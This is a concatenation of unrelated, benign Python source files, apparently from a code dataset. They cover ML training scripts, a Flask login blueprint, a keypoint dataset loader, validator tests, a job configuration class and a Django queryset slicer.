(options, args) = parser.parse_args(sys.argv)
if options.event_file is not None:
with open(options.event_file) as json_data:
event = json.load(json_data)
lambda_handler(event, None)
else:
lambda_handler({}, None)
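
# Shape of the event this handler expects, inferred from the accesses above
# (all values are placeholders, not real account data):
#
# {
#     "action": "persist_metadata",
#     "payload": {
#         "account_request": {
#             "account_tags": {"env": "dev"},
#             "account_customizations_name": "baseline"
#         },
#         "account_info": {
#             "account": {
#                 "id": "123456789012", "email": "<EMAIL>", "name": "workload-1",
#                 "joined_date": "2021-01-01", "status": "ACTIVE", "parent_id": "ou-xxxx"
#             }
#         }
#     }
# }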
| StarcoderdataPython |
193461 | import numpy as np
import torch
import pickle
import experiment_runner as er
from torch import nn
import sklearn.datasets
from sklearn.model_selection import train_test_split
from torch.utils.data import TensorDataset
print("test")
n_classes = 10
X, y = sklearn.datasets.make_classification(n_samples=1000,
n_features=10,
n_informative=5,
n_redundant=2,
n_repeated=0,
class_sep=1.0,
n_classes=n_classes)
n_features = X.shape[1]
(X_train, X_test, y_train, y_test) = train_test_split(X, y, test_size=0.2, random_state=7)
BATCH_SIZE = 64
training_dataset = TensorDataset(torch.from_numpy(X_train).float(),
torch.from_numpy(y_train).long())
testing_dataset = TensorDataset(torch.from_numpy(X_test).float(),
torch.from_numpy(y_test).long())
class Classifier(nn.Module):
def __init__(self, n_features, n_hidden=256):
super(Classifier, self).__init__()
self.network = nn.Sequential(
nn.Linear(n_features, n_hidden),
nn.ReLU(),
nn.Linear(n_hidden, n_hidden),
nn.ReLU(),
nn.Linear(n_hidden, n_hidden),
nn.ReLU(),
nn.Linear(n_hidden, n_classes),
            nn.LogSoftmax(dim=1)
)
def forward(self, x):
return self.network(x)
print("test 3")
epsilons = [1 , 10, 100, 1000, 5000, 10000, 50000, 100000]
#epsilons = [0, 1, 100, 1000, 10000, 50000, 100000]
throw_outs = [.03, .07, .1, .2,.5,1, 1.5, 2, 5]
for e in epsilons:
for t in throw_outs:
print(f"model: {e}, {t}, {BATCH_SIZE} begin")
model = Classifier(n_features)
info, mode = er.run_experiment(model,
training_dataset,
testing_dataset,
epsilon=e,
alpha=2,
epochs=200,
add_noise=True,
throw_out_threshold=t,
batch_size=BATCH_SIZE,
lf=torch.nn.NLLLoss,
print_rate=10)
pickle.dump(info, open(f"../../data/synth_{e}_{t}_{BATCH_SIZE}.p", 'wb'))
| StarcoderdataPython |
57497 | <gh_stars>0
from flask import Blueprint, render_template, url_for
auth = Blueprint('auth', __name__)
@auth.route('/login')
def login():
return render_template("login.html")
@auth.route('/logout')
def logout():
return render_template("logout.html")
@auth.route('/sign_up')
def sign_up():
return render_template("sign_up.html") | StarcoderdataPython |
3338642 | #!/usr/bin/python3
c = list('614752839')
def dec(i):
i = int(i) - 1
if i == 0: i = 9
return str(i)
def move(c):
t = c[1:4]
c[1:4] = []
val = dec(c[0])
while val in t:
val = dec(val)
i = c.index(val)
print(t, c, i)
c[i+1:i+1] = t
return c[1:] + [c[0]]
for _ in range(100):
c = move(c)
print(c)
i = c.index('1')
print(''.join(c[i+1:] + c[:i])) | StarcoderdataPython |
1717157 | <reponame>gathierry/FashionAI-KeyPointsDetectionOfApparel<gh_stars>100-1000
import numpy as np
from sklearn.model_selection import train_test_split
import pandas as pd
import cv2
class KPDA():
def __init__(self, config, data_dir, train_val):
self.config = config
if train_val == 'test':
data_dir += 'r2_test_b/'
anno_df = pd.read_csv(data_dir + 'test.csv')
anno_df['image_path'] = data_dir + anno_df['image_id']
# elif train_val == 'val':
# data_dir += 'r1_test_b/'
# anno_df = pd.read_csv(data_dir + 'fashionAI_key_points_test_b_answer_20180426.csv')
# anno_df['image_path'] = data_dir + anno_df['image_id']
else:
data_dir0 = data_dir + 'wu_train/'
anno_df0 = pd.read_csv(data_dir0 + 'Annotations/annotations.csv')
anno_df0['image_path'] = data_dir0 + anno_df0['image_id']
data_dir1 = data_dir + 'r1_train/'
anno_df1 = pd.read_csv(data_dir1 + 'Annotations/train.csv')
anno_df1['image_path'] = data_dir1 + anno_df1['image_id']
data_dir2 = data_dir + 'r1_test_a/'
anno_df2 = pd.read_csv(data_dir2 + 'fashionAI_key_points_test_a_answer_20180426.csv')
anno_df2['image_path'] = data_dir2 + anno_df2['image_id']
# anno_df = pd.concat([anno_df0, anno_df1, anno_df2])
data_dir3 = data_dir + 'r1_test_b/'
anno_df3 = pd.read_csv(data_dir3 + 'fashionAI_key_points_test_b_answer_20180426.csv')
anno_df3['image_path'] = data_dir3 + anno_df3['image_id']
anno_df3_train, anno_df3_val = train_test_split(anno_df3, test_size=0.2, random_state=42)
if train_val == 'train':
anno_df = pd.concat([anno_df0, anno_df1, anno_df2, anno_df3_train])
else:
anno_df = anno_df3_val
self.anno_df = anno_df[anno_df['image_category'] == self.config.clothes]
def size(self):
return len(self.anno_df)
def get_image_path(self, image_index):
row = self.anno_df.iloc[image_index]
image_path = row['image_path']
return image_path
def get_bbox(self, image_index, extend=10):
row = self.anno_df.iloc[image_index]
locs = []
for key, item in row.iteritems():
if key in self.config.keypoints[self.config.clothes]:
loc = [int(x) for x in item.split('_')]
if loc[0] != -1 and loc[1] != -1:
locs.append(loc[:2])
locs = np.array(locs)
minimums = np.amin(locs, axis=0)
maximums = np.amax(locs, axis=0)
bbox = np.array([[max(minimums[0]-extend, 0), max(minimums[1]-extend, 0),
maximums[0]+extend, maximums[1]+extend]], dtype=np.float32)
return bbox
def get_keypoints(self, image_index):
row = self.anno_df.iloc[image_index]
locs = []
for key, item in row.iteritems():
if key in self.config.keypoints[self.config.clothes]:
loc = [int(x) for x in item.split('_')]
locs.append(loc)
locs = np.array(locs)
return locs
def get_default_xy(config, db_path):
kpda = KPDA(config, db_path, 'all')
s = []
for k in range(kpda.size()):
path = kpda.get_image_path(k)
img = cv2.imread(path)
h, w, _ = img.shape
locs = kpda.get_keypoints(k).astype(np.float32)
locs[:, 0] = locs[:, 0].astype(np.float32) / float(w)
locs[:, 1] = locs[:, 1].astype(np.float32) / float(h)
locs[:, 2] = (locs[:, 2]>=0)*1.0
s.append(locs)
s = np.stack(s)
s = s.sum(axis=0)
s = s[:, :2] / s[:, 2:].repeat(2, axis=1)
print(s)
if __name__ == '__main__':
from tqdm import tqdm
import cv2
from src.config import Config
config = Config('dress')
kpda = KPDA(config, '/home/storage/lsy/fashion/FashionAI_Keypoint_Detection/', 'train')
print(kpda.anno_df)
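
# Directory layout assumed by KPDA (taken from the hard-coded paths above):
# <data_dir>/wu_train/Annotations/annotations.csv
# <data_dir>/r1_train/Annotations/train.csv
# <data_dir>/r1_test_a/fashionAI_key_points_test_a_answer_20180426.csv
# <data_dir>/r1_test_b/fashionAI_key_points_test_b_answer_20180426.csv
# <data_dir>/r2_test_b/test.csv
# Each CSV's image_id column holds paths relative to its own split directory,
# and image_category must match config.clothes (e.g. 'dress').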
| StarcoderdataPython |
3244712 | <gh_stars>1-10
from typing import Any, List
from src.spotlight.rules import Rule
from .validator_test import ValidatorTest
class ExactlyFiveCharsRule(Rule):
"""Exactly 5 characters"""
name = "five_chars"
def passes(self, field: str, value: Any, parameters: List[str], validator) -> bool:
self.message_fields = dict(field=field, name="you.can.replace.this")
return len(value) == 5
@property
def message(self) -> str:
return "The {field} field has to be exactly 5 chars long {name}!"
class UppercaseRule(Rule):
"""Uppercase"""
name = "uppercase"
def passes(self, field: str, value: Any, parameters: List[str], validator) -> bool:
self.message_fields = dict(field=field)
return value.upper() == value
@property
def message(self) -> str:
return "The {field} field must be uppercase."
class CustomRuleTest(ValidatorTest):
def setUp(self):
self.validator.fields = {}
def test_custom_rule_uppercase_with_non_uppercase_string_expect_error(self):
field = "test"
rules = {"test": "uppercase"}
data = {"test": "test"}
expected = "The test field must be uppercase."
rule = UppercaseRule()
self.validator.register_rule(rule)
errors = self.validator.validate(data, rules)
errs = errors.get(field)
self.assertEqual(errs[0], expected)
def test_custom_rule_five_chars_with_invalid_string_expect_error(self):
field = "test"
rules = {"test": "five_chars"}
data = {"test": "test"}
rule = ExactlyFiveCharsRule()
self.validator.overwrite_fields = {
"test": "test",
"you.can.replace.this": "custom",
}
expected = rule.message.format(field=field, name="custom")
self.validator.register_rule(rule)
errors = self.validator.validate(data, rules)
errs = errors.get(field)
self.assertEqual(errs[0], expected)
| StarcoderdataPython |
122706 | <gh_stars>0
""" This class will handle a set of configurations and launch several
instances of a Run homogeneous in purpose and structure.
"""
import os
import sys
import yaml
import pyclbr
import logging
from itertools import groupby
from pyrate.utils import strings as ST
from pyrate.utils import functions as FN
from pyrate.core.Run import Run
class Job:
def __init__(self, name, config, log_level):
self.name = name
self.config = config
self.log_level = log_level
def setup(self):
"""Build global Job configuration and instantiate Run objects.
The keys of the following dictionary will be distributed to the Run.
"""
self.job = {
"no_progress_bar": self.config["no_progress_bar"],
"logger": None,
"inputs": {},
"configs": {},
"outputs": {},
}
# --------------------------
# Setup the logger
# --------------------------
self.job["logger"] = logging.getLogger("pyrate")
self.job["logger"].setLevel(getattr(logging, self.log_level))
# --------------------------
# Build global configuration
# --------------------------
for i_name, i_attr in self.config["inputs"].items():
# This dictionary contains all input information. The file list contains lists
# which can have more than one element in the case of multiple channels declared in the group.
self.job["inputs"][i_name] = {"files": []}
            # Files are collected looking for tags separated by underscores. Several options are available
# to collect tags.
# 1) any: (REQUIRED) collect a file if it contains any of these tags.
# 2) all: collect a file if it contains all of these tags.
            # 3) groups: if a file starts with any of the tags declared here it will be considered as part of a group.
#
# Files can also be added providing their full path under the 'path' field. Notice that if the 'samples' options
# are ALSO provided, all files added in this way will be selected according to the 'tags' rules as usual.
for f in FN.find_files(i_attr["path"], "PYRATE"):
if "samples" in i_attr:
self.job["inputs"][i_name]["files"].extend(
f
for s in ST.get_items(i_attr["samples"]["tags"]["any"])
if s in ST.get_tags(f)
and FN.modus_ponens(
"all" in i_attr["samples"]["tags"],
all(
t in ST.get_tags(f)
for t in ST.get_items(
i_attr["samples"]["tags"].get("all", False)
)
),
)
and FN.modus_ponens(
"groups" in i_attr["samples"]["tags"],
any(
c in ST.get_tags(f)
for c in ST.get_items(
i_attr["samples"]["tags"].get("groups", False)
)
),
)
)
else:
self.job["inputs"][i_name]["files"].append(f)
# removing duplicates from the list of files. At this stage no groups are built yet.
self.job["inputs"][i_name]["files"] = ST.remove_duplicates(
self.job["inputs"][i_name]["files"]
)
# Group files using the first tag found in their name.
self.job["inputs"][i_name]["files"] = [
list(f)
for j, f in groupby(
self.job["inputs"][i_name]["files"],
lambda a: a.partition("_")[0]
if FN.find("groups", i_attr)
else None,
)
]
if not self.job["inputs"][i_name]["files"]:
sys.exit(
f"ERROR: no input files found for input {i_name} under path {i_attr['path']}"
)
# Add all remaining attributes.
self.job["inputs"][i_name].update(i_attr)
self.job["configs"]["global"] = {"objects": {}}
for c_name, c_attr in self.config["configs"].items():
self.job["configs"][c_name] = {"files": []}
"""
for f in FN.find_files(c_attr["path"], "PYRATE"):
self.job["configs"][c_name]["files"].extend(f)
for t in ST.get_tags(f)
for s in FN.find("any", c_attr):
ST.get_items(s)
if s in ST.get_tags(f):
True
for s in FN.find("all", c_attr):
ST.get_items(s)
if s in ST.get_tags(f):
True
"""
for f in FN.find_files(c_attr["path"], "PYRATE"):
self.job["configs"][c_name]["files"].extend(
f
for n in ST.get_items(c_attr["tags"]["any"])
if n in ST.get_tags(f)
and FN.modus_ponens(
"all" in c_attr["tags"],
all(
t in ST.get_tags(f)
for t in ST.get_items(c_attr["tags"].get("all", False))
),
)
and f.lower().endswith(".yaml")
)
for f in self.job["configs"][c_name]["files"]:
self.job["configs"][c_name].update(yaml.full_load(open(f, "r")))
self.job["configs"]["global"]["objects"].update(
self.job["configs"][c_name]["objects"]
)
for o_name, o_attr in self.config["outputs"].items():
self.job["outputs"][o_name] = {"files": []}
o_attr["path"] = FN.find_env(o_attr["path"], "PYRATE")
self.job["outputs"][o_name]["files"] = os.path.join(o_attr["path"], o_name)
for target in o_attr["targets"]:
for t_name, t_attr in target.items():
if t_attr == "all":
samples = ST.remove_duplicates(self.job["inputs"])
else:
samples = ST.get_items(target[t_name])
samples.sort()
s_names = ",".join(samples)
target[t_name] = samples
target[":".join([t_name, s_names])] = target.pop(t_name)
self.job["outputs"][o_name].update(o_attr)
# --------------------------
# Validate configuration
# --------------------------
# The configuration validation runs conservatively on all objects in the
# configuration files passed, even if they are not needed by any target.
for obj_name, obj_attr in self.job["configs"]["global"]["objects"].items():
self._validate_conf(obj_name, obj_attr)
# --------------------------
# Build dependencies
# --------------------------
# Build object dependencies to guarantee that all states are run consistently.
for obj_name, obj_attr in self.job["configs"]["global"]["objects"].items():
self._build_dependencies(obj_name, obj_attr)
# FN.pretty(self.job["configs"]["global"]["objects"])
# sys.exit()
# -----------------------
# Instantiate Run object
# -----------------------
self.run = Run(f"{self.name}_run", self.job)
self.run.setup()
def launch(self):
"""Launch Run objects. """
self.run.launch()
def _validate_conf(self, obj_name, obj_conf):
"""Checks:
1) That the configured object implements an algorithm field.
2) That the algorithm field implements a name field.
3) That alg_name corresponds to one pyrate module and one only.
4) That the module contains the definition of a class called alg_name.
5) That the states required at configuration match those implemented by the algorithm.
6) That configured states require some input or output fields.
"""
# Check 1
if not FN.check("algorithm", obj_conf):
sys.exit(
f"ERROR: object {obj_name} has no algorithm field in its configuration!"
)
# Check 2
if not FN.check("name", obj_conf["algorithm"]):
sys.exit(f"ERROR: please specify algorithm name for object {obj_name}!")
pyrate_modules = [m for m in sys.modules if "pyrate" in m]
n_alg_definitions = 0
alg_name = obj_conf["algorithm"]["name"]
states = ["initialise", "execute", "finalise"]
for m in pyrate_modules:
if alg_name == m.split(".")[-1]:
n_alg_definitions += 1
# Check 4
if not alg_name in pyclbr.readmodule(f"{m}").keys():
sys.exit(
f"ERROR: module {m} has to contain an algorithm called {alg_name}!"
)
alg_methods = pyclbr.readmodule(f"{m}")[alg_name].__dict__["children"]
# some algorithms might simply want to reimplement
# the internal methods to prepare the input, so the underscore
# has to be replaced (see Algorithm definition).
alg_methods = [a.replace("_", "") for a in alg_methods]
alg_states = set([s for s in alg_methods if s in states])
conf_states = set([s for s in states if FN.check(s, obj_conf)])
# Check 5
if not alg_states == conf_states:
sys.exit(
f"ERROR: states mismatch b/w object {obj_name} and algorithm {alg_name}!"
)
# Check 6
for s in conf_states:
if not (
FN.check("input", obj_conf[s])
or FN.check("output", obj_conf[s])
):
sys.exit(
f"ERROR: state {s} for object {obj_name} has no input or output fields defined!\nPlease add at least one of the fields"
)
# Check 3
if n_alg_definitions == 0:
e_msg = f"ERROR: while checking the configuration for {obj_name}, no suitable {alg_name} module has been found!\n"
e_msg += "1) The algorithm / module has to be added to its local __init__.py file.\n"
e_msg += "2) Make sure the name of the algorithm is written correctly.\n"
e_msg += "3) The module and the algorithm have to have the same name.\n"
sys.exit(e_msg)
elif n_alg_definitions > 1:
sys.exit(
f"ERROR: while checking the configuration for {obj_name}, {n_alg_definitions} definitions of a module called {alg_name} have been found!"
)
def _build_dependencies(self, obj_name, obj_conf):
"""Adds consistent dependencies from the global configuration."""
g_config = self.job["configs"]["global"]["objects"]
states = ["initialise", "execute", "finalise"]
for s_idx, s in enumerate(states):
prev_states = states[:s_idx]
if s in obj_conf:
if "input" in obj_conf[s]:
if not "dependency" in obj_conf:
obj_conf["dependency"] = {
"initialise": set(),
"execute": set(),
"finalise": set(),
}
for o in ST.get_items(obj_conf[s]["input"]):
if not o in g_config:
if self._is_required(o, prev_states, obj_conf):
sys.exit(
f"ERROR: {o} is required by {obj_name} for {s} but is not in the global configuration!"
)
else:
obj_conf["dependency"][s].add(o)
for ps in prev_states:
if ps in g_config[o]:
obj_conf["dependency"][ps].add(o)
# If the object relies on an initialise or finalise method, these have to put
# on the permanent store some data identifiable with the object name.
"""
if s == ["initialise", "finalise"]:
if not "output" in obj_conf[s]:
obj_conf[s]["output"] = "SELF"
else:
if not "SELF" in ST.get_items(obj_conf[s]["output"]):
obj_conf[s]["output"] += f", SELF"
"""
def _is_required(self, dep_obj_name, prev_states, obj_conf):
"""Returns False if an object is not computed upstream by an algorithm."""
if "EVENT:" in dep_obj_name:
return False
if "INPUT:" in dep_obj_name:
return False
for ps in prev_states:
if ps in obj_conf:
if "output" in obj_conf[ps]:
if dep_obj_name in ST.get_items(obj_conf[ps]["output"]):
return True
return False
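
# Sketch of the config dict Job expects (reconstructed from the accesses in setup();
# every name, tag and path below is an illustrative placeholder):
#
# config = {
#     "no_progress_bar": False,
#     "inputs": {
#         "myInput": {"path": "/path/to/data",
#                     "samples": {"tags": {"any": "run1, run2",   # required
#                                          "all": "calibrated",   # optional
#                                          "groups": "ch"}}},     # optional
#     },
#     "configs": {
#         "myConfig": {"path": "/path/to/configs", "tags": {"any": "objects_v1"}}
#     },
#     "outputs": {
#         "output.dat": {"path": "/path/to/out", "targets": [{"myObject": "all"}]}
#     },
# }
# job = Job("myJob", config, "INFO"); job.setup(); job.launch()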
# EOF
| StarcoderdataPython |
11132 | <filename>django_elastic_appsearch/slicer.py<gh_stars>10-100
"""A Queryset slicer for Django."""
def slice_queryset(queryset, chunk_size):
"""Slice a queryset into chunks."""
start_pk = 0
queryset = queryset.order_by('pk')
while True:
# No entry left
if not queryset.filter(pk__gt=start_pk).exists():
break
try:
# Fetch chunk_size entries if possible
end_pk = queryset.filter(pk__gt=start_pk).values_list(
'pk', flat=True)[chunk_size - 1]
# Fetch rest entries if less than chunk_size left
except IndexError:
end_pk = queryset.values_list('pk', flat=True).last()
yield queryset.filter(pk__gt=start_pk).filter(pk__lte=end_pk)
start_pk = end_pk
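
# Usage sketch (the model below is hypothetical; any Django queryset whose primary
# key supports ordered comparison works, since the slicer orders and filters on pk):
#
# from myapp.models import Article
# for chunk in slice_queryset(Article.objects.all(), chunk_size=500):
#     for obj in chunk:
#         index_to_app_search(obj)  # placeholder for per-object work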
| StarcoderdataPython |
1614565 | <gh_stars>10-100
#!/bin/sh
''''exec python3 -u -- "$0" ${1+"$@"} # '''
# #! /usr/bin/env python3
# Copyright 2016 Euclidean Technologies Management LLC All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import time
import os
import sys
import copy
import numpy as np
import tensorflow as tf
import model_utils
import configs
from tensorflow.python.platform import gfile
from batch_generator import BatchGenerator
def run_epoch(session, model, dataset,
keep_prob=1.0, passes=1.0, verbose=False):
"""Run the specified data set through the model.
Args:
session: The tf session to run graph in
model: The model. An object of type deep_rnn_model
dataset: The data. An object of type BatchGenerator
keep_prob: Dropout keep_prob for training
verbose: Display iteration output to stdout
Returns:
train_cost: average cross-entropy loss value on data
train_accy: average binary classification accuracy rate
valid_cost: average cross-entropy loss value on data
valid_accy: average binary classification accuracy rate
Raises:
RuntimeError: the batch size cannot be larger than the training
data set size
"""
num_batches = dataset.num_batches
start_time = time.time()
train_cost = train_accy = valid_cost = valid_accy = 0.0
train_evals = valid_evals = 0.0
dot_count = 0
total_steps = int(passes*num_batches)
prog_int = total_steps/100 # progress interval for stdout
if not num_batches > 0:
raise RuntimeError("batch_size*num_unrollings is larger "
"than the training set size.")
    dataset.rewind() # make sure we start at the beginning
print("batches: %d "%num_batches,end=' ')
for step in range(total_steps):
batch = dataset.next_batch()
(tcost, taccy, tevals,
vcost, vaccy, vevals) = model.train_step(session, batch,
keep_prob=keep_prob)
train_cost += tcost
train_accy += taccy
train_evals += tevals
valid_cost += vcost
valid_accy += vaccy
valid_evals += vevals
if ( verbose and ((prog_int<=1) or
(step % (int(prog_int)+1)) == 0) ):
dot_count += 1
print('.',end='')
sys.stdout.flush()
if verbose:
print("."*(100-dot_count),end='')
print(" passes: %.2f train iters: %d valid iters: %d "
"speed: %.0f seconds" % (passes,
train_evals,
valid_evals,
(time.time() - start_time)) )
sys.stdout.flush()
return (train_cost/train_evals,
1.0 - train_accy/train_evals,
valid_cost/valid_evals,
1.0 - valid_accy/valid_evals)
def main(_):
"""
Entry point and main loop for train_net.py. Uses command line arguments to get
model and training specification (see config.py).
"""
configs.DEFINE_string("train_datafile", None,"Training file")
configs.DEFINE_string("optimizer", 'gd', 'Optimizer to use gd, adam, adagrad, momentum')
configs.DEFINE_float("lr_decay",0.9, "Learning rate decay")
configs.DEFINE_float("initial_learning_rate",1.0,"Initial learning rate")
configs.DEFINE_float("validation_size",0.0,"Size of validation set as %")
configs.DEFINE_float("passes",1.0,"Passes through day per epoch")
configs.DEFINE_float("rnn_loss_weight",None,"How much moret to weight kth example")
configs.DEFINE_integer("max_epoch",0,"Stop after max_epochs")
configs.DEFINE_integer("early_stop",None,"Early stop parameter")
configs.DEFINE_integer("seed",None,"Seed for deterministic training")
config = configs.get_configs()
if config.train_datafile is None:
config.train_datafile = config.datafile
train_path = model_utils.get_data_path(config.data_dir,config.train_datafile)
print("Loading training data ...")
train_data = BatchGenerator(train_path, config,
config.batch_size,config.num_unrollings,
validation_size=config.validation_size,
randomly_sample=True)
tf_config = tf.ConfigProto( allow_soft_placement=True ,
log_device_placement=False )
with tf.Graph().as_default(), tf.Session(config=tf_config) as session:
if config.seed is not None:
tf.set_random_seed(config.seed)
print("Constructing model ...")
model = model_utils.get_training_model(session, config, verbose=True)
if config.early_stop is not None:
print("Training will early stop without "
"improvement after %d epochs."%config.early_stop)
train_history = list()
valid_history = list()
# This sets the initial learning rate tensor
lr = model.assign_lr(session,config.initial_learning_rate)
for i in range(config.max_epoch):
trc, tre, vdc, vde = run_epoch(session, model, train_data,
keep_prob=config.keep_prob,
passes=config.passes,
verbose=True)
trc = 999.0 if trc > 999.0 else trc
vdc = 999.0 if vdc > 999.0 else vdc
print( ('Epoch: %d loss: %.6f %.6f'
' error: %.6f %.6f Learning rate: %.4f') %
(i + 1, trc, vdc, tre, vde, lr) )
sys.stdout.flush()
train_history.append( trc )
valid_history.append( vdc )
# update learning rate
if config.optimizer == 'gd' or config.optimizer == 'momentum':
lr = model_utils.adjust_learning_rate(session, model,
lr, config.lr_decay, train_history )
if not os.path.exists(config.model_dir):
print("Creating directory %s" % config.model_dir)
os.mkdir(config.model_dir)
chkpt_file_prefix = "training.ckpt"
if model_utils.stop_training(config,valid_history,chkpt_file_prefix):
print("Training stopped.")
quit()
else:
checkpoint_path = os.path.join(config.model_dir, chkpt_file_prefix)
tf.train.Saver().save(session, checkpoint_path, global_step=i)
if __name__ == "__main__":
tf.app.run()
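
# Invocation sketch: the flags registered above via configs.DEFINE_* (plus whatever
# configs.get_configs() defines elsewhere) are passed on the command line; the values
# below are placeholders, not recommended settings:
#   python train_net.py --train_datafile=train.dat --optimizer=adam \
#       --initial_learning_rate=0.6 --lr_decay=0.9 --max_epoch=100 --validation_size=0.2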
| StarcoderdataPython |